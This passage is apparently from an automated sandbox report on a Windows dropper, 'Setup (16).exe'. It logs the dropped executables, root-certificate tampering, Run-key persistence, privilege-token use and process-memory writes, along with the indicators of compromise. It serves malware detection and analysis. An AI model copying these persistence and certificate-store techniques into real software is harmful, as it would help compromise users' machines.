04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5825CD2FAF4DF974B7FCFA637B8FBBB1F2468ACC RUNDLL32.EXE -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 223 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 227 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 514 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 219 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 236 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 440 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 383 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 384 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 207 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 217 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 271 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 209 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 211 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 425 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 164 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 186 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 269 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 428 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 128 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 199 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 210 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 596 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 218 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 511 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 529 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 488 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 588 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 616 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 136 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 180 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 205 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup (16).exeu_WsNa6cDylZ6Kk8IXnl9Dwe.exeWerFault.exepid process 416 Setup (16).exe 416 Setup (16).exe 4064 u_WsNa6cDylZ6Kk8IXnl9Dwe.exe 4064 u_WsNa6cDylZ6Kk8IXnl9Dwe.exe 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe 4924 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3032 -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
u_WsNa6cDylZ6Kk8IXnl9Dwe.exe0j1XEd3i2H8D1EkGWbm2zOLn.exegrwjjwvdcwjjwvpid process 4064 u_WsNa6cDylZ6Kk8IXnl9Dwe.exe 6588 0j1XEd3i2H8D1EkGWbm2zOLn.exe 8040 grwjjwv 7896 dcwjjwv -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
5964124.exe8072963.exepid process 6772 5964124.exe 7964 8072963.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
0iH1ZoEGEfyOl63MBMIV3FJl.exe76D9MXWXSFxmg9B1iuFaSEs0.exeO1bmzy6hcL_ue4W6_oFG7oRj.exeERnyngf0jZ4AXCtsC6Vzb5fr.exeFrOT7ywwiOn3pZMpUygcU_Xj.exeWerFault.exeQv0NxjyB_7TwiACykTPQ3vaQ.exeWerFault.exeWerFault.exeWerFault.exeszjOvCqo9VEEZPC9Tfhj3aWF.exe8272687.exeWerFault.exe7330856.exeWerFault.exe1921738.exeWerFault.exeZ3gXMcAFuW2Jb_9JpfQ0VRMd.exetaskkill.exeaskinstall53.exedescription pid process Token: SeDebugPrivilege 2204 0iH1ZoEGEfyOl63MBMIV3FJl.exe Token: SeDebugPrivilege 3536 76D9MXWXSFxmg9B1iuFaSEs0.exe Token: SeDebugPrivilege 1388 O1bmzy6hcL_ue4W6_oFG7oRj.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeDebugPrivilege 1928 ERnyngf0jZ4AXCtsC6Vzb5fr.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeDebugPrivilege 584 FrOT7ywwiOn3pZMpUygcU_Xj.exe Token: SeRestorePrivilege 4924 WerFault.exe Token: SeBackupPrivilege 4924 WerFault.exe Token: SeDebugPrivilege 772 Qv0NxjyB_7TwiACykTPQ3vaQ.exe Token: SeDebugPrivilege 4924 WerFault.exe Token: SeDebugPrivilege 5056 WerFault.exe Token: SeDebugPrivilege 1172 WerFault.exe Token: SeDebugPrivilege 4232 WerFault.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeDebugPrivilege 1792 szjOvCqo9VEEZPC9Tfhj3aWF.exe Token: SeDebugPrivilege 3208 8272687.exe Token: SeDebugPrivilege 4252 WerFault.exe Token: SeDebugPrivilege 3860 7330856.exe Token: SeDebugPrivilege 4960 WerFault.exe Token: SeDebugPrivilege 4824 1921738.exe Token: SeDebugPrivilege 4420 WerFault.exe Token: SeDebugPrivilege 1900 Z3gXMcAFuW2Jb_9JpfQ0VRMd.exe Token: SeDebugPrivilege 2300 taskkill.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeCreateTokenPrivilege 5384 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 5384 askinstall53.exe Token: SeLockMemoryPrivilege 5384 askinstall53.exe Token: SeIncreaseQuotaPrivilege 5384 askinstall53.exe Token: SeMachineAccountPrivilege 5384 askinstall53.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
BfBxd79SbWYrnSnDsotyYWPf.tmpdllhost.exeCleaner Installation.exeWEATHER Manager.tmpVPN.tmpSetup.exeSetup.tmpSetup.tmp6hwbhPS0ueyEdNW1h1g_ykqO.tmpultramediaburner.tmpEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.compid process 4400 BfBxd79SbWYrnSnDsotyYWPf.tmp 3032 3032 5348 dllhost.exe 5168 Cleaner Installation.exe 5360 WEATHER Manager.tmp 3032 3032 5576 VPN.tmp 6712 Setup.exe 5204 Setup.tmp 4028 Setup.tmp 6020 6hwbhPS0ueyEdNW1h1g_ykqO.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4028 Setup.tmp 4728 ultramediaburner.tmp 6720 Esplorarne.exe.com 3032 3032 6720 Esplorarne.exe.com 6720 Esplorarne.exe.com 6720 Esplorarne.exe.com 3032 3032 6892 Esplorarne.exe.com 6892 Esplorarne.exe.com 6892 Esplorarne.exe.com 7848 Esplorarne.exe.com 7848 Esplorarne.exe.com 7848 Esplorarne.exe.com 6160 Esplorarne.exe.com 6160 Esplorarne.exe.com 6160 Esplorarne.exe.com -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Esplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comMsiExec.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comTrustedInstaller.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.compid process 3032 3032 6720 Esplorarne.exe.com 6720 Esplorarne.exe.com 6720 Esplorarne.exe.com 6720 Esplorarne.exe.com 6892 Esplorarne.exe.com 6892 Esplorarne.exe.com 6892 Esplorarne.exe.com 7848 Esplorarne.exe.com 7848 Esplorarne.exe.com 7848 Esplorarne.exe.com 6160 Esplorarne.exe.com 6160 Esplorarne.exe.com 6160 Esplorarne.exe.com 6352 Esplorarne.exe.com 6352 Esplorarne.exe.com 6352 Esplorarne.exe.com 8012 Esplorarne.exe.com 8012 Esplorarne.exe.com 8012 Esplorarne.exe.com 8540 Esplorarne.exe.com 8540 Esplorarne.exe.com 8540 Esplorarne.exe.com 8540 Esplorarne.exe.com 8856 Esplorarne.exe.com 8856 Esplorarne.exe.com 8856 Esplorarne.exe.com 9152 MsiExec.exe 9152 MsiExec.exe 9152 MsiExec.exe 7652 Esplorarne.exe.com 7652 Esplorarne.exe.com 7652 Esplorarne.exe.com 7652 Esplorarne.exe.com 9148 Esplorarne.exe.com 9148 Esplorarne.exe.com 9148 Esplorarne.exe.com 9148 Esplorarne.exe.com 8952 Esplorarne.exe.com 8952 Esplorarne.exe.com 8952 Esplorarne.exe.com 8952 Esplorarne.exe.com 6920 Esplorarne.exe.com 6920 Esplorarne.exe.com 6920 Esplorarne.exe.com 9024 TrustedInstaller.exe 9024 TrustedInstaller.exe 9024 TrustedInstaller.exe 8856 Esplorarne.exe.com 8856 Esplorarne.exe.com 8856 Esplorarne.exe.com 8856 Esplorarne.exe.com 8816 Esplorarne.exe.com 8816 Esplorarne.exe.com 8816 Esplorarne.exe.com 8816 Esplorarne.exe.com 9048 Esplorarne.exe.com 9048 Esplorarne.exe.com 9048 Esplorarne.exe.com 7040 Esplorarne.exe.com 7040 Esplorarne.exe.com 7040 Esplorarne.exe.com 3012 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
cmd.exedcwjjwvEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.compid process 7480 cmd.exe 3032 7896 dcwjjwv 6624 Esplorarne.exe.com 5276 Esplorarne.exe.com 6392 Esplorarne.exe.com 5476 Esplorarne.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup (16).exehBS_VbW.EXEdescription pid process target process PID 416 wrote to memory of 3536 416 Setup (16).exe 76D9MXWXSFxmg9B1iuFaSEs0.exe PID 416 wrote to memory of 3536 416 Setup (16).exe 76D9MXWXSFxmg9B1iuFaSEs0.exe PID 416 wrote to memory of 2204 416 Setup (16).exe 0iH1ZoEGEfyOl63MBMIV3FJl.exe PID 416 wrote to memory of 2204 416 Setup (16).exe 0iH1ZoEGEfyOl63MBMIV3FJl.exe PID 416 wrote to memory of 2204 416 Setup (16).exe 0iH1ZoEGEfyOl63MBMIV3FJl.exe PID 416 wrote to memory of 500 416 Setup (16).exe Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 416 wrote to memory of 500 416 Setup (16).exe Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 416 wrote to memory of 500 416 Setup (16).exe Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 416 wrote to memory of 584 416 Setup (16).exe FrOT7ywwiOn3pZMpUygcU_Xj.exe PID 416 wrote to memory of 584 416 Setup (16).exe FrOT7ywwiOn3pZMpUygcU_Xj.exe PID 416 wrote to memory of 584 416 Setup (16).exe FrOT7ywwiOn3pZMpUygcU_Xj.exe PID 416 wrote to memory of 3696 416 Setup (16).exe pihzVpjsMBxeP2HpzjpDHV4j.exe PID 416 wrote to memory of 3696 416 Setup (16).exe pihzVpjsMBxeP2HpzjpDHV4j.exe PID 416 wrote to memory of 3696 416 Setup (16).exe pihzVpjsMBxeP2HpzjpDHV4j.exe PID 416 wrote to memory of 3688 416 Setup (16).exe Q5cDgQSeXWc9DEicqlskiRMy.exe PID 416 wrote to memory of 3688 416 Setup (16).exe Q5cDgQSeXWc9DEicqlskiRMy.exe PID 416 wrote to memory of 3688 416 Setup (16).exe Q5cDgQSeXWc9DEicqlskiRMy.exe PID 416 wrote to memory of 1388 416 Setup (16).exe O1bmzy6hcL_ue4W6_oFG7oRj.exe PID 416 wrote to memory of 1388 416 Setup (16).exe O1bmzy6hcL_ue4W6_oFG7oRj.exe PID 416 wrote to memory of 1388 416 Setup (16).exe O1bmzy6hcL_ue4W6_oFG7oRj.exe PID 416 wrote to memory of 4064 416 Setup (16).exe u_WsNa6cDylZ6Kk8IXnl9Dwe.exe PID 416 wrote to memory of 4064 416 Setup (16).exe u_WsNa6cDylZ6Kk8IXnl9Dwe.exe PID 416 wrote to memory of 4064 416 Setup (16).exe u_WsNa6cDylZ6Kk8IXnl9Dwe.exe PID 416 wrote to memory of 1792 416 Setup (16).exe szjOvCqo9VEEZPC9Tfhj3aWF.exe PID 416 wrote to memory of 1792 416 Setup (16).exe szjOvCqo9VEEZPC9Tfhj3aWF.exe PID 416 wrote to memory of 1792 416 Setup (16).exe szjOvCqo9VEEZPC9Tfhj3aWF.exe PID 416 wrote to memory of 1764 416 Setup (16).exe rejtRzn8M6moTkkzPiqh5X1M.exe PID 416 wrote to memory of 1764 416 Setup (16).exe rejtRzn8M6moTkkzPiqh5X1M.exe PID 416 wrote to memory of 1764 416 Setup (16).exe rejtRzn8M6moTkkzPiqh5X1M.exe PID 416 wrote to memory of 3800 416 Setup (16).exe K2F3HK3oxaqe4XumGVM8K2CN.exe PID 416 wrote to memory of 3800 416 Setup (16).exe K2F3HK3oxaqe4XumGVM8K2CN.exe PID 416 wrote to memory of 3800 416 Setup (16).exe K2F3HK3oxaqe4XumGVM8K2CN.exe PID 416 wrote to memory of 1248 416 Setup (16).exe ep_w4UBkXtmsr5S8c_BCYuj9.exe PID 416 wrote to memory of 1248 416 Setup (16).exe ep_w4UBkXtmsr5S8c_BCYuj9.exe PID 416 wrote to memory of 1248 416 Setup (16).exe ep_w4UBkXtmsr5S8c_BCYuj9.exe PID 416 wrote to memory of 3300 416 Setup (16).exe 7TAW5mYXsk9p20DliYoWKdYO.exe PID 416 wrote to memory of 3300 416 Setup (16).exe 7TAW5mYXsk9p20DliYoWKdYO.exe PID 416 wrote to memory of 3300 416 Setup (16).exe 7TAW5mYXsk9p20DliYoWKdYO.exe PID 416 wrote to memory of 2276 416 Setup (16).exe 9AU9I15CCD6EpK299hgTkZdS.exe PID 416 wrote to memory of 2276 416 Setup (16).exe 9AU9I15CCD6EpK299hgTkZdS.exe PID 416 wrote to memory of 2276 416 Setup (16).exe 9AU9I15CCD6EpK299hgTkZdS.exe PID 500 wrote to memory of 3828 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 500 wrote to memory of 3828 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 500 wrote to memory of 3828 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 416 wrote to memory of 1108 416 Setup (16).exe lDjuHqMg4MkTM1qdSGZyxIsk.exe PID 416 wrote to memory of 1108 416 Setup (16).exe lDjuHqMg4MkTM1qdSGZyxIsk.exe PID 416 wrote to memory of 1108 416 Setup (16).exe lDjuHqMg4MkTM1qdSGZyxIsk.exe PID 416 wrote to memory of 1576 416 Setup (16).exe YrpxH5F8UH0Rr76g0v7Av5_I.exe PID 416 wrote to memory of 1576 416 Setup (16).exe YrpxH5F8UH0Rr76g0v7Av5_I.exe PID 416 wrote to memory of 1576 416 Setup (16).exe YrpxH5F8UH0Rr76g0v7Av5_I.exe PID 416 wrote to memory of 1900 416 Setup (16).exe Z3gXMcAFuW2Jb_9JpfQ0VRMd.exe PID 416 wrote to memory of 1900 416 Setup (16).exe Z3gXMcAFuW2Jb_9JpfQ0VRMd.exe PID 416 wrote to memory of 1900 416 Setup (16).exe Z3gXMcAFuW2Jb_9JpfQ0VRMd.exe PID 500 wrote to memory of 772 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 500 wrote to memory of 772 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 500 wrote to memory of 772 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 416 wrote to memory of 3932 416 Setup (16).exe Tg0MZP2Rwd8_X1BaskraQAmY.exe PID 416 wrote to memory of 3932 416 Setup (16).exe Tg0MZP2Rwd8_X1BaskraQAmY.exe PID 416 wrote to memory of 3932 416 Setup (16).exe Tg0MZP2Rwd8_X1BaskraQAmY.exe PID 416 wrote to memory of 1928 416 Setup (16).exe ERnyngf0jZ4AXCtsC6Vzb5fr.exe PID 416 wrote to memory of 1928 416 Setup (16).exe ERnyngf0jZ4AXCtsC6Vzb5fr.exe PID 416 wrote to memory of 1928 416 Setup (16).exe ERnyngf0jZ4AXCtsC6Vzb5fr.exe PID 500 wrote to memory of 772 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe PID 500 wrote to memory of 772 500 hBS_VbW.EXE Qv0NxjyB_7TwiACykTPQ3vaQ.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2660
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
PID:2804 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies registry class
PID:5588
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2636
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2484
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2472
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1820
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1416
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1300
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1220
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1084
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:356 -
C:\Users\Admin\AppData\Roaming\dcwjjwvC:\Users\Admin\AppData\Roaming\dcwjjwv2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7896
-
-
C:\Users\Admin\AppData\Roaming\grwjjwvC:\Users\Admin\AppData\Roaming\grwjjwv2⤵PID:8824
-
C:\Users\Admin\AppData\Roaming\grwjjwvC:\Users\Admin\AppData\Roaming\grwjjwv3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8040
-
-
-
C:\Users\Admin\AppData\Roaming\grwjjwvC:\Users\Admin\AppData\Roaming\grwjjwv2⤵PID:1756
-
C:\Users\Admin\AppData\Roaming\grwjjwvC:\Users\Admin\AppData\Roaming\grwjjwv3⤵PID:1132
-
-
-
C:\Users\Admin\AppData\Roaming\dcwjjwvC:\Users\Admin\AppData\Roaming\dcwjjwv2⤵
- Checks whether UAC is enabled
PID:6624
-
-
C:\Users\Admin\AppData\Roaming\grwjjwvC:\Users\Admin\AppData\Roaming\grwjjwv2⤵PID:5932
-
C:\Users\Admin\AppData\Roaming\grwjjwvC:\Users\Admin\AppData\Roaming\grwjjwv3⤵PID:3212
-
-
-
C:\Users\Admin\AppData\Roaming\dcwjjwvC:\Users\Admin\AppData\Roaming\dcwjjwv2⤵PID:1668
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:352
-
C:\Users\Admin\AppData\Local\Temp\Setup (16).exe"C:\Users\Admin\AppData\Local\Temp\Setup (16).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Users\Admin\Documents\Qv0NxjyB_7TwiACykTPQ3vaQ.exe"C:\Users\Admin\Documents\Qv0NxjyB_7TwiACykTPQ3vaQ.exe"2⤵
- Executes dropped EXE
PID:500 -
C:\Users\Admin\Documents\Qv0NxjyB_7TwiACykTPQ3vaQ.exeC:\Users\Admin\Documents\Qv0NxjyB_7TwiACykTPQ3vaQ.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Users\Admin\Documents\Qv0NxjyB_7TwiACykTPQ3vaQ.exeC:\Users\Admin\Documents\Qv0NxjyB_7TwiACykTPQ3vaQ.exe3⤵
- Executes dropped EXE
PID:3828
-
-
-
C:\Users\Admin\Documents\FrOT7ywwiOn3pZMpUygcU_Xj.exe"C:\Users\Admin\Documents\FrOT7ywwiOn3pZMpUygcU_Xj.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Users\Admin\Documents\0iH1ZoEGEfyOl63MBMIV3FJl.exe"C:\Users\Admin\Documents\0iH1ZoEGEfyOl63MBMIV3FJl.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Users\Admin\Documents\0iH1ZoEGEfyOl63MBMIV3FJl.exe"C:\Users\Admin\Documents\0iH1ZoEGEfyOl63MBMIV3FJl.exe"3⤵
- Executes dropped EXE
PID:3252
-
-
-
C:\Users\Admin\Documents\Q5cDgQSeXWc9DEicqlskiRMy.exe"C:\Users\Admin\Documents\Q5cDgQSeXWc9DEicqlskiRMy.exe"2⤵
- Executes dropped EXE
PID:3688
-
-
C:\Users\Admin\Documents\76D9MXWXSFxmg9B1iuFaSEs0.exe"C:\Users\Admin\Documents\76D9MXWXSFxmg9B1iuFaSEs0.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3536 -
C:\Users\Admin\AppData\Roaming\8272687.exe"C:\Users\Admin\AppData\Roaming\8272687.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
C:\Users\Admin\AppData\Roaming\4904915.exe"C:\Users\Admin\AppData\Roaming\4904915.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4712 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:4648
-
-
-
C:\Users\Admin\AppData\Roaming\1921738.exe"C:\Users\Admin\AppData\Roaming\1921738.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Users\Admin\AppData\Roaming\7330856.exe"C:\Users\Admin\AppData\Roaming\7330856.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
-
C:\Users\Admin\Documents\pihzVpjsMBxeP2HpzjpDHV4j.exe"C:\Users\Admin\Documents\pihzVpjsMBxeP2HpzjpDHV4j.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3696 -
C:\Users\Admin\Documents\pihzVpjsMBxeP2HpzjpDHV4j.exe"C:\Users\Admin\Documents\pihzVpjsMBxeP2HpzjpDHV4j.exe"3⤵
- Executes dropped EXE
PID:4268
-
-
-
C:\Users\Admin\Documents\u_WsNa6cDylZ6Kk8IXnl9Dwe.exe"C:\Users\Admin\Documents\u_WsNa6cDylZ6Kk8IXnl9Dwe.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4064
-
-
C:\Users\Admin\Documents\O1bmzy6hcL_ue4W6_oFG7oRj.exe"C:\Users\Admin\Documents\O1bmzy6hcL_ue4W6_oFG7oRj.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Users\Admin\Documents\szjOvCqo9VEEZPC9Tfhj3aWF.exe"C:\Users\Admin\Documents\szjOvCqo9VEEZPC9Tfhj3aWF.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Users\Admin\Documents\rejtRzn8M6moTkkzPiqh5X1M.exe"C:\Users\Admin\Documents\rejtRzn8M6moTkkzPiqh5X1M.exe"2⤵
- Executes dropped EXE
PID:1764 -
C:\Users\Admin\Documents\rejtRzn8M6moTkkzPiqh5X1M.exe"C:\Users\Admin\Documents\rejtRzn8M6moTkkzPiqh5X1M.exe"3⤵
- Modifies data under HKEY_USERS
PID:7976
-
-
-
C:\Users\Admin\Documents\K2F3HK3oxaqe4XumGVM8K2CN.exe"C:\Users\Admin\Documents\K2F3HK3oxaqe4XumGVM8K2CN.exe"2⤵
- Executes dropped EXE
PID:3800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 7003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 6763⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 6923⤵
